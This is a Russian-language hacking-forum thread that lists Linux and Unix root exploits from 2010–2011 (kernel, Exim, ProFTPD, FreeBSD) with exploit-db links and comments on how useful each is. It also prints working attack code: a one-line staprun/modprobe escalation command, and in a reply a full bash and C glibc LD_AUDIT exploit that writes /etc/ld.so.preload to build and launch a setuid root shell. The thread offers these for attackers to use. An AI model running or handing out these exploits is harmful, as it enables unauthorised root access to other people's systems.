Авторизация  
zm1

> Linux/Unix Root Эксплоиты, 110219 Добавлено два ProFTPd эксплоита

В теме 2 сообщения

Ubuntu 10.10 64-bit and Ubuntu 10.10 32-bit

http://www.exploit-db.com/exploits/15944/

Linux Kernel CAP_SYS_ADMIN (32 and 64-bit)

Kernel Version >= 2.6.34 (untested on earlier versions)

Published: 2011-01-08

>>> http://forum.exploit.in/index.php?showtopic=43395

КАП_СИС трудно эксплуатировать.

 

 

#Exim 4.63 (Почта) RedHat/Centos/Debian Remote Root

http://www.exploit-db.com/exploits/15725/

Ещё и в Метасплоите

>>> http://forum.exploit.in/index.php?showtopic=42627

В декабре 2010 был эффективным, но своё уже отжил. Примечательно что это remote root.

 

 

27-го Ноября 2010 был опубликован следующий эксплоит. Ввиду лёгкой эксплуатации и широкой распространнёности, он является очень полезным. Какие версии уязвимы - неясно, но проверить конкретную машину очень легко.

 

Код

printf “install uprobes /bin/sh” > exploit.conf; MODPROBE_OPTIONS=”-C exploit.conf” staprun -u [имя пользователя]

 

>>> http://forum.exploit.in/index.php?showtopic=41867

 

 

ProFTPD 'mod_sql' < 1.3.3.D

Published: 2010-11-18

http://www.securityfocus.com/bid/44933/references

 

 

ProFTPD < 1.3.3.B

Published: 2010-11-07

http://www.exploit-db.com/exploits/15449/

 

 

Linux Kernel <= 2.6.36-rc8 RDS x86

http://www.exploit-db.com/exploits/15285/

CVE: 2010-3904

Published: 2010-10-19

>>> http://forum.exploit.in/index.php?showtopic=40594

 

 

FreeBSD mbufs() v.7.0-8.*

26.09.2010

>>> http://forum.exploit.in/index.php?showtopic=39835

 

 

http://forum.exploit.in/index.php?sh...p;#entry289911

glibc эксплоит

 

> Ввиду лёгкой эксплуатации и широкой распространнёности, он является очень полезным.

 

отнюдь не широкой. емнип systemtap-runtime по дефолту ставят только в редхате, а на 90% серверов с центосью и подобными rpm-based дистрами этот staprun не установлен.

и, как обычно, в зузе оно не работает, и не работало даже на момент выхода ыксплоета

 

> glibc эксплоит

 

для старого бебиана (вроде <=5.0.5) вот этот удобнее:

 

#!/bin/bash

OUTPUT=/etc/ld.so.preload

MASK='umask'

umask 0

LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="$OUTPUT" ping 2> /dev/null

if [ ! -f $OUTPUT ]; then

echo "System does not appear to be vulnerable"

exit 0

fi

echo -n > $OUTPUT

umask $MASK

cat > sh.c << EOF

#include <unistd.h>

#include <stdio.h>

int main (int argc, char **argv, char **envp)

{

char *args[] = { "/bin/sh", NULL };

setuid(geteuid());

setgid(getegid());

execve(args[0], args, envp);

perror("execve failed");

return 0;

}

EOF

gcc sh.c -o sh

cat > libpwn.c << EOF

#include <sys/stat.h>

#include <unistd.h>

uid_t getuid (void)

{

chown("$PWD/sh", 0, 0);

chmod("$PWD/sh", S_ISUID|S_IRUSR|S_IWUSR|S_IXUSR|S_IRGRP|S_IXGRP|S_ IROTH|S_IXOTH);

return 0;

}

EOF

gcc -Wall -fPIC -c libpwn.c

gcc -shared -Wl,-soname,libpwn.so -o libpwn.so libpwn.o

echo "$PWD/libpwn.so" > $OUTPUT

ping 2> /dev/null

echo -n > $OUTPUT

./sh

 

этот ^^^ сплоент для debian-based дистров!

 

Статья не моя копиаст с експлоита )

Поделиться сообщением


Ссылка на сообщение

Ну что это капипаст это ежу понятно и нахера такою бесполезную хрень выкладывать

Те кто шарят в эксплойтах без проблем любой сплойт на любом языке юзают с баг трекеров

Те кто шарят в метасплойте им тем более эти эксплойты не нужны так как давно уже есть в

в базе сплойтов к чему этот шлак здесь ПРЕДЛАГАЮ ДАБЫ НЕ ЗАСОРЯТЬ ФОРУМ НАЧИСЛЯТЬ ШТРАФНЫЕ БАЛЫ ЗА РАЗМЕЩЕНИЕ ТОКОГО МУСОРНОГО МАТ И ПО НАБОРУ БАЛОВ БАНАН ЧТОБЫ НЕ ГАДИЛИ БЕСТОЛКУ КТО ЗА ПЛЮСУЕМ

Поделиться сообщением


Ссылка на сообщение

Для публикации сообщений создайте учётную запись или авторизуйтесь

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти
Авторизация